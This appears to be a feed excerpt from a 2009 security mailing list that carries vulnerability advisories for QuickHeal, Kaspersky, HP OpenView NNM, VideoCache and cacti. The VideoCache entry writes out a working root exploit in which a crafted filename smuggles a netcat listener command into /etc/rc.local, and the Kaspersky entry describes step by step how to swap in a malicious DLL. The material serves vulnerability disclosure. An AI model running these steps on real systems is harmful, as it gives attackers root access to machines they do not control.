	<link rel="alternate" type="text/html" href="http://old.nabble.com/Cisco-Security-Advisory%3A-Multiple-Cisco-WebEx-WRF-Player-Vulnerabilities-tp26816378p26816378.html" />
</entry>

<entry>
	<id>tag:old.nabble.com,2006:post-26815694</id>
	<title>{PRL} QuickHeal antivirus 2010 Local Privilege Escalation</title>
	<published>2009-12-16T08:55:33Z</published>
	<updated>2009-12-16T08:55:33Z</updated>
	<author>
		<name>Protek Research Lab</name>
	</author>
	<content type="html">#####################################################################################
&lt;br&gt;&lt;br&gt;Application:  QuickHeal antivirus 2010 Local Privilege Escalation
&lt;br&gt;            
&lt;br&gt;Platforms:    Windows Vista SP2
&lt;br&gt;&lt;br&gt;Exploitation: Local Privilege Escalation
&lt;br&gt;&lt;br&gt;Date:         2009-12-16
&lt;br&gt;&lt;br&gt;Author:       Francis Provencher (Protek Research Lab's) 
&lt;br&gt;&lt;br&gt;          
&lt;br&gt;#####################################################################################
&lt;br&gt;&lt;br&gt;1) Introduction
&lt;br&gt;2) Technical details
&lt;br&gt;3) The Code (N/A)
&lt;br&gt;&lt;br&gt;&lt;br&gt;#####################################################################################
&lt;br&gt;&lt;br&gt;===============
&lt;br&gt;1) Introduction
&lt;br&gt;===============
&lt;br&gt;QuickHeal antivirus 2010
&lt;br&gt;&lt;br&gt;Quick Heal AntiVirus 2010, with its intuitive and easy-to-use interface, provides hassle-free protection for your system. Once 
&lt;br&gt;&lt;br&gt;installed it acts as a shield against viruses, worms, trojans, spywares and other malicious threats. It also provides protection 
&lt;br&gt;&lt;br&gt;against new and unknown viruses using Quick Heal's renowned DNAScan technology, and blocks malicious websites. Quick Heal AntiVirus 
&lt;br&gt;&lt;br&gt;2010 is very low on resource usage and gives enhanced protection without slowing down your computer.
&lt;br&gt;&lt;br&gt;(from QuickHeal Anti-virus website)
&lt;br&gt;&lt;br&gt;&lt;br&gt;#####################################################################################
&lt;br&gt;&lt;br&gt;============================
&lt;br&gt;2) Technical details 
&lt;br&gt;============================
&lt;br&gt;&lt;br&gt;QuickHeal antivirus 2010
&lt;br&gt;Build 11.00 (4.0.0.1)
&lt;br&gt;&lt;br&gt;All files under the install folder have Full control for BUILTIN\users and can be replace with malicious files.
&lt;br&gt;&lt;br&gt;... snip ...
&lt;br&gt;&lt;br&gt;&lt;br&gt;C:\Program Files\Quick Heal\Quick Heal AntiVirus\SCANWSCS.EXE Everyone:(ID)F
&lt;br&gt;&lt;br&gt;&lt;br&gt;... snip ...
&lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;#####################################################################################
&lt;br&gt;&lt;br&gt;===========
&lt;br&gt;3) The Code
&lt;br&gt;===========
&lt;br&gt;&lt;br&gt;N\A
&lt;br&gt;&lt;br&gt;&lt;br&gt;#####################################################################################
&lt;br&gt;(PRL-2009-25)
&lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp; __________________________________________________________________
&lt;br&gt;Looking for the perfect gift? Give the gift of Flickr! 
&lt;br&gt;&lt;br&gt;&lt;a href=&quot;http://www.flickr.com/gift/&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;http://www.flickr.com/gift/&lt;/a&gt;&lt;br&gt;&lt;br&gt;</content>
	<link rel="alternate" type="text/html" href="http://old.nabble.com/%7BPRL%7D-QuickHeal-antivirus-2010-Local-Privilege-Escalation-tp26815694p26815694.html" />
</entry>

<entry>
	<id>tag:old.nabble.com,2006:post-26815009</id>
	<title>[security bulletin] HPSBMA02416 SSRT090008 rev.4 - HP OpenView Network Node Manager (OV NNM), Remote Execution of Arbitrary Code</title>
	<published>2009-12-16T05:55:57Z</published>
	<updated>2009-12-16T05:55:57Z</updated>
	<author>
		<name>security-alert</name>
	</author>
	<content type="html">-----BEGIN PGP SIGNED MESSAGE-----
&lt;br&gt;Hash: SHA1
&lt;br&gt;&lt;br&gt;SUPPORT COMMUNICATION - SECURITY BULLETIN
&lt;br&gt;&lt;br&gt;Document ID: c01696729
&lt;br&gt;Version: 4
&lt;br&gt;&lt;br&gt;HPSBMA02416 SSRT090008 rev.4 - HP OpenView Network Node Manager (OV NNM), Remote Execution of Arbitrary Code
&lt;br&gt;&lt;br&gt;NOTICE: The information in this Security Bulletin should be acted upon as soon as possible.
&lt;br&gt;&lt;br&gt;Release Date: 2009-03-23
&lt;br&gt;Last Updated: 2009-12-15
&lt;br&gt;&lt;br&gt;Potential Security Impact: Remote execution of arbitrary code
&lt;br&gt;&lt;br&gt;Source: Hewlett-Packard Company, HP Software Security Response Team
&lt;br&gt;&lt;br&gt;VULNERABILITY SUMMARY
&lt;br&gt;Potential vulnerabilities have been identified with HP OpenView Network Node Manager (OV NNM). The vulnerabilities could be exploited remotely to execute arbitrary code.
&lt;br&gt;&lt;br&gt;References: CVE-2009-0920, CVE-2009-0921
&lt;br&gt;&lt;br&gt;SUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed.
&lt;br&gt;HP OpenView Network Node Manager (OV NNM) v7.01, v7.51, v7.53 running on HP-UX, Linux, Solaris, and Windows
&lt;br&gt;&lt;br&gt;BACKGROUND
&lt;br&gt;&lt;br&gt;CVSS 2.0 Base Metrics
&lt;br&gt;===========================================================
&lt;br&gt;&amp;nbsp; Reference &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp;Base Vector &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; Base Score
&lt;br&gt;CVE-2009-0920 &amp;nbsp; &amp;nbsp;(AV:N/AC:L/Au:N/C:P/I:P/A:N) &amp;nbsp; &amp;nbsp; &amp;nbsp; 6.4
&lt;br&gt;CVE-2009-0921 &amp;nbsp; &amp;nbsp;(AV:N/AC:L/Au:N/C:P/I:P/A:N) &amp;nbsp; &amp;nbsp; &amp;nbsp; 6.4
&lt;br&gt;===========================================================
&lt;br&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp;Information on CVSS is documented
&lt;br&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; in HP Customer Notice: HPSN-2008-002
&lt;br&gt;&lt;br&gt;The Hewlett-Packard Company thanks Oren Isacson of Core Security Technologies for reporting these vulnerabilities to &lt;a href=&quot;http://old.nabble.com/user/SendEmail.jtp?type=post&amp;post=26815009&amp;i=0&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;security-alert@...&lt;/a&gt;.
&lt;br&gt;&lt;br&gt;RESOLUTION
&lt;br&gt;&lt;br&gt;HP has made patches available to resolve the vulnerabilities for NNM v7.53.
&lt;br&gt;&lt;br&gt;HP has made archive files available to resolve the vulnerabilities for NNM v7.01. The archive files are listed in the NNM v7.01 table below. The table also lists required patches. The patches will insure that NNM v7.01 is compatible with the software files in the archive.
&lt;br&gt;&lt;br&gt;The patches are available from &lt;a href=&quot;http://support.openview.hp.com/selfsolve/patches&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;http://support.openview.hp.com/selfsolve/patches&lt;/a&gt;&lt;br&gt;&lt;br&gt;Note: The patches are not available from the HP IT Resource Center (ITRC).
&lt;br&gt;&lt;br&gt;OV NNM v7.53
&lt;br&gt;&lt;br&gt;Operating System
&lt;br&gt;&amp;nbsp;Patch
&lt;br&gt;&lt;br&gt;HP-UX (IA)
&lt;br&gt;&amp;nbsp;PHSS_39640 or subsequent
&lt;br&gt;&lt;br&gt;HP-UX (PA)
&lt;br&gt;&amp;nbsp;PHSS_39639 or subsequent
&lt;br&gt;&lt;br&gt;Linux RedHatAS2.1
&lt;br&gt;&amp;nbsp;LXOV_00095 or subsequent
&lt;br&gt;&lt;br&gt;Linux RedHat4AS-x86_64
&lt;br&gt;&amp;nbsp;LXOV_00096 or subsequent
&lt;br&gt;&lt;br&gt;Solaris
&lt;br&gt;&amp;nbsp;PSOV_03520 or subsequent
&lt;br&gt;&lt;br&gt;Windows
&lt;br&gt;&amp;nbsp;NNM_01198 or subsequent
&lt;br&gt;&lt;br&gt;OV NNM v7.51
&lt;br&gt;&lt;br&gt;Upgrade to NNM v7.53 and apply the NNM v7.53 patches listed above.
&lt;br&gt;Patch bundles for upgrading from NNM v7.51 to NNM v7.53 are available using ftp:
&lt;br&gt;&lt;br&gt;Host
&lt;br&gt;&amp;nbsp;Account
&lt;br&gt;&amp;nbsp;Password
&lt;br&gt;&lt;br&gt;ftp.usa.hp.com
&lt;br&gt;&amp;nbsp;nnm_753
&lt;br&gt;&amp;nbsp;Update53
&lt;br&gt;&lt;br&gt;OV NNM v7.01 with Intermediate Patch 12
&lt;br&gt;&lt;br&gt;Operating_System
&lt;br&gt;&amp;nbsp;Required_Patch
&lt;br&gt;&amp;nbsp;Archive_File
&lt;br&gt;&amp;nbsp;SHA-1_Hash_for_Archive_File
&lt;br&gt;&lt;br&gt;HP-UX (PA)
&lt;br&gt;&amp;nbsp;PHSS_38761
&lt;br&gt;&amp;nbsp;SSRT090008.QCCR1B26779.701_IP12.hotfix.tar
&lt;br&gt;&amp;nbsp;ec4e-6b8a-0628-fcc5-d8fa-7147-824d-047b-3034-ea6f
&lt;br&gt;&lt;br&gt;Solaris
&lt;br&gt;&amp;nbsp;PSOV_03516
&lt;br&gt;&amp;nbsp;SSRT090008.QCCR1B26779.701_IP12.hotfix.tar
&lt;br&gt;&amp;nbsp;ec4e-6b8a-0628-fcc5-d8fa-7147-824d-047b-3034-ea6f
&lt;br&gt;&lt;br&gt;Windows
&lt;br&gt;&amp;nbsp;NNM_01194
&lt;br&gt;&amp;nbsp;SSRT090008.QCCR1B26779.701_IP12.hotfix.tar
&lt;br&gt;&amp;nbsp;ec4e-6b8a-0628-fcc5-d8fa-7147-824d-047b-3034-ea6f
&lt;br&gt;&lt;br&gt;The archive files are available using ftp:
&lt;br&gt;&lt;br&gt;Host
&lt;br&gt;&amp;nbsp;Account
&lt;br&gt;&amp;nbsp;Password
&lt;br&gt;&lt;br&gt;ftp.usa.hp.com
&lt;br&gt;&amp;nbsp;sb02416
&lt;br&gt;&amp;nbsp;Secure12
&lt;br&gt;&lt;br&gt;MANUAL ACTIONS: Yes
&lt;br&gt;NNM v7.51 - Update to v7.53 and apply the appropriate patch
&lt;br&gt;NNM v7.01 - Apply the appropriate patch and then apply the archive file
&lt;br&gt;&lt;br&gt;PRODUCT SPECIFIC INFORMATION
&lt;br&gt;&lt;br&gt;HP-UX Software Assistant: HP-UX Software Assistant is an enhanced application that replaces HP-UX Security Patch Check. It analyzes all Security Bulletins issued by HP and lists recommended actions that may apply to a specific HP-UX system. It can also download patches and create a depot automatically. For more information see &lt;a href=&quot;https://www.hp.com/go/swa&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;https://www.hp.com/go/swa&lt;/a&gt;&lt;br&gt;&lt;br&gt;The following text is for use by the HP-UX Software Assistant.
&lt;br&gt;&lt;br&gt;AFFECTED VERSIONS (for HP-UX)
&lt;br&gt;&lt;br&gt;For HP-UX OV NNM 7.51 and 7.53
&lt;br&gt;HP-UX B.11.31
&lt;br&gt;HP-UX B.11.23 (IA)
&lt;br&gt;HP-UX B.11.23 (PA)
&lt;br&gt;HP-UX B.11.11
&lt;br&gt;=============
&lt;br&gt;OVNNMgr.OVNNM-RUN,fr=B.07.50.00
&lt;br&gt;action: install the patches listed in the Resolution
&lt;br&gt;&lt;br&gt;For HP-UX OV NNM 7.01
&lt;br&gt;HP-UX B.11.11
&lt;br&gt;=============
&lt;br&gt;OVNNMgr.OVNNM-RUN,fr=B.07.01.00
&lt;br&gt;action: install the patches and archive files listed in the Resolution
&lt;br&gt;&lt;br&gt;END AFFECTED VERSIONS (for HP-UX)
&lt;br&gt;&lt;br&gt;HISTORY
&lt;br&gt;Version:1 (rev.1) - 23 March 2009 Initial release
&lt;br&gt;Version:2 (rev.2) - 31 March 2009 Archive available for NNM v7.53 with Intermediate Patch 22
&lt;br&gt;Version:3 (rev.3) - 6 April 2009 Archive rev.1 available for NNM v7.53 with Intermediate Patch 22
&lt;br&gt;Version:4 (rev.4) - 15 December 2009 Patches available for NNM v7.53, archive files on ftp.usa.hp.com
&lt;br&gt;&lt;br&gt;Third Party Security Patches: Third party security patches that are to be installed on systems running HP software products should be applied in accordance with the customer's patch management policy.
&lt;br&gt;&lt;br&gt;Support: For further information, contact normal HP Services support channel.
&lt;br&gt;&lt;br&gt;Report: To report a potential security vulnerability with any HP supported product, send Email to: &lt;a href=&quot;http://old.nabble.com/user/SendEmail.jtp?type=post&amp;post=26815009&amp;i=1&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;security-alert@...&lt;/a&gt;
&lt;br&gt;It is strongly recommended that security related information being communicated to HP be encrypted using PGP, especially exploit information.
&lt;br&gt;To get the security-alert PGP key, please send an e-mail message as follows:
&lt;br&gt;&amp;nbsp; To: &lt;a href=&quot;http://old.nabble.com/user/SendEmail.jtp?type=post&amp;post=26815009&amp;i=2&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;security-alert@...&lt;/a&gt;
&lt;br&gt;&amp;nbsp; Subject: get key
&lt;br&gt;Subscribe: To initiate a subscription to receive future HP Security Bulletins via Email:
&lt;br&gt;&lt;a href=&quot;http://h30046.www3.hp.com/driverAlertProfile.php?regioncode=NA&amp;langcode=USENG&amp;jumpid=in_SC-GEN__driverITRC&amp;topiccode=ITRC&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;http://h30046.www3.hp.com/driverAlertProfile.php?regioncode=NA&amp;langcode=USENG&amp;jumpid=in_SC-GEN__driverITRC&amp;topiccode=ITRC&lt;/a&gt;&lt;br&gt;On the web page: ITRC security bulletins and patch sign-up
&lt;br&gt;Under Step1: your ITRC security bulletins and patches
&lt;br&gt;&amp;nbsp; &amp;nbsp; -check ALL categories for which alerts are required and continue.
&lt;br&gt;Under Step2: your ITRC operating systems
&lt;br&gt;&amp;nbsp; &amp;nbsp; -verify your operating system selections are checked and save.
&lt;br&gt;&lt;br&gt;To update an existing subscription: &lt;a href=&quot;http://h30046.www3.hp.com/subSignIn.php&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;http://h30046.www3.hp.com/subSignIn.php&lt;/a&gt;&lt;br&gt;Log in on the web page: Subscriber's choice for Business: sign-in.
&lt;br&gt;On the web page: Subscriber's Choice: your profile summary - use Edit Profile to update appropriate sections.
&lt;br&gt;&lt;br&gt;To review previously published Security Bulletins visit: &lt;a href=&quot;http://www.itrc.hp.com/service/cki/secBullArchive.do&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;http://www.itrc.hp.com/service/cki/secBullArchive.do&lt;/a&gt;&lt;br&gt;&lt;br&gt;* The Software Product Category that this Security Bulletin
&lt;br&gt;relates to is represented by the 5th and 6th characters
&lt;br&gt;of the Bulletin number in the title:
&lt;br&gt;&lt;br&gt;GN = HP General SW
&lt;br&gt;MA = HP Management Agents
&lt;br&gt;MI = Misc. 3rd Party SW
&lt;br&gt;MP = HP MPE/iX
&lt;br&gt;NS = HP NonStop Servers
&lt;br&gt;OV = HP OpenVMS
&lt;br&gt;PI = HP Printing &amp; Imaging
&lt;br&gt;ST = HP Storage SW
&lt;br&gt;TL = HP Trusted Linux
&lt;br&gt;TU = HP Tru64 UNIX
&lt;br&gt;UX = HP-UX
&lt;br&gt;VV = HP VirtualVault
&lt;br&gt;&lt;br&gt;System management and security procedures must be reviewed frequently to maintain system integrity. HP is continually reviewing and enhancing the security features of software products to provide customers with current secure solutions.
&lt;br&gt;&lt;br&gt;&amp;quot;HP is broadly distributing this Security Bulletin in order to bring to the attention of users of the affected HP products the important security information contained in this Bulletin. HP recommends that all users determine the applicability of this information to their individual situations and take appropriate action. HP does not warrant that this information is necessarily accurate or complete for all user situations and, consequently, HP will not be responsible for any damages resulting from user's use or disregard of the information provided in this Bulletin. To the extent permitted by law, HP disclaims all warranties, either express or implied, including the warranties of merchantability and fitness for a particular purpose, title and non-infringement.&amp;quot;
&lt;br&gt;&lt;br&gt;Copyright 2009 Hewlett-Packard Development Company, L.P.
&lt;br&gt;Hewlett-Packard Company shall not be liable for technical or editorial errors or omissions contained herein. The information provided is provided &amp;quot;as is&amp;quot; without warranty of any kind. To the extent permitted by law, neither HP or its affiliates, subcontractors or suppliers will be liable for incidental,special or consequential damages including downtime cost; lost profits;damages relating to the procurement of substitute products or services; or damages for loss of data, or software restoration. The information in this document is subject to change without notice. Hewlett-Packard Company and the names of Hewlett-Packard products referenced herein are trademarks of Hewlett-Packard Company in the United States and other countries. Other product and company names mentioned herein may be trademarks of their respective owners.
&lt;br&gt;-----BEGIN PGP SIGNATURE-----
&lt;br&gt;Version: GnuPG v1.4.10 (GNU/Linux)
&lt;br&gt;&lt;br&gt;iEYEARECAAYFAksnvJYACgkQ4B86/C0qfVm9iACgprAskDU6znScaM/dvNnwuWnD
&lt;br&gt;TtgAoNAdUbG/wpBdIlYFh3cavxN7AXw4
&lt;br&gt;=lQnk
&lt;br&gt;-----END PGP SIGNATURE-----
&lt;br&gt;</content>
	<link rel="alternate" type="text/html" href="http://old.nabble.com/-security-bulletin--HPSBMA02416-SSRT090008-rev.4---HP-OpenView-Network-Node-Manager-%28OV-NNM%29%2C-Remote-Execution-of-Arbitrary-Code-tp26815009p26815009.html" />
</entry>

<entry>
	<id>tag:old.nabble.com,2006:post-26814523</id>
	<title>Kaspersky Lab Multiple Products Local Privilege Escalation Vulnerability</title>
	<published>2009-12-16T04:58:17Z</published>
	<updated>2009-12-16T04:58:17Z</updated>
	<author>
		<name>ss_contacts</name>
	</author>
	<content type="html">ShineShadow Security Report 16122009-15
&lt;br&gt;&lt;br&gt;TITLE
&lt;br&gt;&lt;br&gt;Kaspersky Lab Multiple Products Local Privilege Escalation Vulnerability
&lt;br&gt;&lt;br&gt;BACKGROUND
&lt;br&gt;&lt;br&gt;Due to its high level of professionalism and dedication, Kaspersky Lab has become a market leader in the development of antivirus protection. The companys main product, Kaspersky Anti-Virus, regularly receives top awards in tests conducted by respected international research centers and IT publications. Kaspersky Lab was the first to develop many technological standards in the antivirus industry, including full-scale solutions for Linux, Unix and NetWare, a new-generation heuristic analyzer designed to detect newly emerging viruses, effective protection against polymorphic and macro viruses, continuously updated antivirus databases and a technique for detecting viruses in archived files.
&lt;br&gt;&lt;br&gt;Source: &lt;a href=&quot;http://www.kaspersky.com&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;http://www.kaspersky.com&lt;/a&gt;&lt;br&gt;&lt;br&gt;VULNERABLE PRODUCTS
&lt;br&gt;&lt;br&gt;Kaspersky Anti-Virus 5.0 for Windows Workstations (5.0.712)
&lt;br&gt;Kaspersky Antivirus Personal 5.0.x
&lt;br&gt;Kaspersky Anti-Virus 6.0 for Windows Workstations (6.0.3.837)
&lt;br&gt;Kaspersky Anti-Virus 6.0 for Windows File Servers (6.0.3.837)
&lt;br&gt;Kaspersky Anti-Virus 7 (7.0.1.325)
&lt;br&gt;Kaspersky Anti-Virus 2009 (8.0.0.x)
&lt;br&gt;Kaspersky Anti-Virus 2010 (9.0.0.463)
&lt;br&gt;Kaspersky Internet Security 7 (7.0.1.325)
&lt;br&gt;Kaspersky Internet Security 2009 (8.0.0.x)
&lt;br&gt;Kaspersky Internet Security 2010 (9.0.0.463)
&lt;br&gt;&lt;br&gt;Prior versions may also be affected.
&lt;br&gt;&lt;br&gt;DETAILS
&lt;br&gt;&lt;br&gt;Insecure permissions have been detected in the multiple Kaspersky Lab antivirus products. Everyone&amp;quot; group has Full Control rights to the BASES folder. The folder consists of antivirus bases, configuration files and executable modules. Local attacker (unprivileged user) can replace some files (for example, executable modules) by malicious file and execute arbitrary code with SYSTEM privileges. This is local privilege escalation vulnerability.
&lt;br&gt;&lt;br&gt;For example, in Kaspersky Anti-Virus 2010 (9.0.0.463) the following attack scenario could be used:
&lt;br&gt;1. An attacker (unprivileged user) replaces one of the *.kdl files by malicious dynamic link library (DLL). The replacing file could be - %ALLUSERSPROFILE%\Application Data\Kaspersky Lab\AVP9\Bases\vulns.kdl.
&lt;br&gt;2. Restart the system.
&lt;br&gt;After restart attackers malicious DLL will be loaded with SYSTEM privileges.
&lt;br&gt;&lt;br&gt;Self-defense of  the Kaspersky Anti-Virus will prevent all operations with own files. It can be bypassed using internal shell dialogs in Kaspersky Anti-Virus (for example, &amp;quot;Open&amp;quot; dialog in Quarantine).
&lt;br&gt;&lt;br&gt;For other vulnerable Kaspersky Lab products similar attack scenario could be used.
&lt;br&gt;&lt;br&gt;EXPLOITATION 
&lt;br&gt;&lt;br&gt;An attacker must have valid logon credentials to a system where vulnerable software is installed.
&lt;br&gt;&lt;br&gt;WORKAROUND
&lt;br&gt;&lt;br&gt;Kaspersky Lab has addressed this vulnerability by releasing fixed versions of the vulnerable products:
&lt;br&gt;Kaspersky Anti-Virus 2010 (9.0.0.736)
&lt;br&gt;Kaspersky Internet Security 2010 (9.0.0.736)
&lt;br&gt;Kaspersky Anti-Virus 6.0 for Windows Workstations (6.0.4.1212)
&lt;br&gt;Kaspersky Anti-Virus 6.0 for Windows File Servers (6.0.4.1212)
&lt;br&gt;&lt;br&gt;DISCLOSURE TIMELINE
&lt;br&gt;&lt;br&gt;16/07/2009 Initial vendor notification. Secure contacts requested.
&lt;br&gt;16/07/2009 Vendor response 
&lt;br&gt;16/07/2009 Vulnerability details sent
&lt;br&gt;21/07/2009 Vendor accepted vulnerability for analysis
&lt;br&gt;0708/2009 Vendor confirmed vulnerability in personal and corporate product lines and notified that the vulnerability will be fixed in new versions of vulnerable products 
&lt;br&gt;23/09/2009 Update status query sent
&lt;br&gt;17/09/2009 Vendor response that the vulnerability will be fixed in October but in the last product lines only (personal 2010 CF2 and corporate MP4). Fixing the vulnerability in prior product lines is not planned.
&lt;br&gt;01/10/2009 Corporate product line has been updated (Kaspersky Anti-Virus for Windows Workstations 6.0.4.1212 released)
&lt;br&gt;22/10/2009 Kaspersky Anti-Virus 2010 and Kaspersky Internet Security 2010 Critical Fix 2 released
&lt;br&gt;16/12/2009 Advisory released
&lt;br&gt;&lt;br&gt;CREDITS
&lt;br&gt;&lt;br&gt;Maxim A. Kulakov (ShineShadow) 
&lt;br&gt;ss_contacts[at]hotmail.com 
&lt;br&gt;&lt;br&gt;&lt;br&gt;</content>
	<link rel="alternate" type="text/html" href="http://old.nabble.com/Kaspersky-Lab-Multiple-Products-Local-Privilege-Escalation-Vulnerability-tp26814523p26814523.html" />
</entry>

<entry>
	<id>tag:old.nabble.com,2006:post-26814250</id>
	<title>VideoCache 1.9.2 vccleaner root vulnerability</title>
	<published>2009-12-16T04:37:51Z</published>
	<updated>2009-12-16T04:37:51Z</updated>
	<author>
		<name>Dominick LaTrappe</name>
	</author>
	<content type="html">====[ SYNOPSIS ]=====================================================
&lt;br&gt;&lt;br&gt;VideoCache is a Squid URL rewriter plugin written in Python for 
&lt;br&gt;bandwidth optimization while browsing video sharing websites. &amp;nbsp;Version 
&lt;br&gt;1.9.2 allows a user with the privileges of the Squid proxy server to 
&lt;br&gt;append semi-arbitrary data to arbitrary files with root privileges, upon 
&lt;br&gt;the administrator's execution of the 'vccleaner' utility.
&lt;br&gt;&lt;br&gt;&lt;br&gt;====[ DISCUSSION ]===================================================
&lt;br&gt;&lt;br&gt;VideoCache's 'vccleaner' utility is intended to be executed with root 
&lt;br&gt;permissions periodically, to remove expired videos from the cache.
&lt;br&gt;(The utility will refuse to execute without root permissions.)
&lt;br&gt;Upon execution, it looks for old files under the cache directory
&lt;br&gt;/var/spool/videocache (writable by the Squid proxy user) and deletes
&lt;br&gt;them. &amp;nbsp;Each deleted filename is logged to vccleaner.log, located in 
&lt;br&gt;/var/log/videocache (directory writable by the Squid proxy user).
&lt;br&gt;&lt;br&gt;&lt;br&gt;====[ EXPLOIT ]======================================================
&lt;br&gt;&lt;br&gt;.........................attacker.........................
&lt;br&gt;$ id
&lt;br&gt;uid=13(proxy) gid=13(proxy) groups=13(proxy)
&lt;br&gt;$ cd /var/log/videocache
&lt;br&gt;$ touch -d 19700101 &amp;quot;/var/spool/videocache/youtube/money
&lt;br&gt;&amp;gt; nc -l -p 31337 -c sushi
&lt;br&gt;&amp;gt; monkey&amp;quot;
&lt;br&gt;$ rm -f vccleaner.log
&lt;br&gt;$ ln -s /etc/rc.local vccleaner.log
&lt;br&gt;&lt;br&gt;.........................admin.........................
&lt;br&gt;# id
&lt;br&gt;uid=0(root) gid=0(root) groups=0(root)
&lt;br&gt;# vccleaner
&lt;br&gt;Videocache cleaning has completed successfully.
&lt;br&gt;&lt;br&gt;.........................postmortem.........................
&lt;br&gt;$ cat /etc/rc.local
&lt;br&gt;2009-12-16 06:56:29,403 INFO START Starting Videocache Cleaner.
&lt;br&gt;2009-12-16 06:56:29,403 INFO DELETE /var/spool/videocache/youtube/money
&lt;br&gt;nc -l -p 31337 -c sushi
&lt;br&gt;monkey Older than 14594 day(s) was deleted.
&lt;br&gt;2009-12-16 06:56:29,404 INFO STOP Stopping Videocache Cleaner.
&lt;br&gt;&lt;br&gt;&lt;br&gt;====[ SHOUT OUTS ]===================================================
&lt;br&gt;&lt;br&gt;Tim, Ben, my buddies at GS, Alien Time Agent, and big man O.
&lt;br&gt;&lt;br&gt;</content>
	<link rel="alternate" type="text/html" href="http://old.nabble.com/VideoCache-1.9.2-vccleaner-root-vulnerability-tp26814250p26814250.html" />
</entry>

<entry>
	<id>tag:old.nabble.com,2006:post-26814034</id>
	<title>[SECURITY] [DSA 1954-1] New cacti packages fix insufficient input sanitising</title>
	<published>2009-12-16T03:47:37Z</published>
	<updated>2009-12-16T03:47:37Z</updated>
	<author>
		<name>Steffen Joeris-3</name>
	</author>
	<content type="html">-----BEGIN PGP SIGNED MESSAGE-----
&lt;br&gt;Hash: SHA1
&lt;br&gt;&lt;br&gt;- ------------------------------------------------------------------------
&lt;br&gt;Debian Security Advisory DSA-1954-1 &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp;&lt;a href=&quot;http://old.nabble.com/user/SendEmail.jtp?type=post&amp;post=26814034&amp;i=0&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;security@...&lt;/a&gt;
&lt;br&gt;&lt;a href=&quot;http://www.debian.org/security/&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;http://www.debian.org/security/&lt;/a&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; Steffen Joeris
&lt;br&gt;December 16, 2009 &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &lt;a href=&quot;http://www.debian.org/security/faq&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;http://www.debian.org/security/faq&lt;/a&gt;&lt;br&gt;- ------------------------------------------------------------------------
&lt;br&gt;&lt;br&gt;Package &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp;: cacti &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; 
&lt;br&gt;Vulnerability &amp;nbsp;: insufficient input sanitising &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; 
&lt;br&gt;Problem type &amp;nbsp; : remote &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp;
&lt;br&gt;Debian-specific: no &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp;
&lt;br&gt;CVE Ids &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp;: CVE-2007-3112 CVE-2007-3113 CVE-2009-4032 &amp;nbsp; &amp;nbsp; 
&lt;br&gt;Debian Bugs &amp;nbsp; &amp;nbsp;: 429224 &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp;
&lt;br&gt;&lt;br&gt;Several vulnerabilities have been found in cacti, a frontend to rrdtool
&lt;br&gt;for monitoring systems and services. The Common Vulnerabilities and
&lt;br&gt;Exposures project identifies the following problems:
&lt;br&gt;&lt;br&gt;CVE-2007-3112, CVE-2007-3113
&lt;br&gt;&lt;br&gt;It was discovered that cacti is prone to a denial of service via the
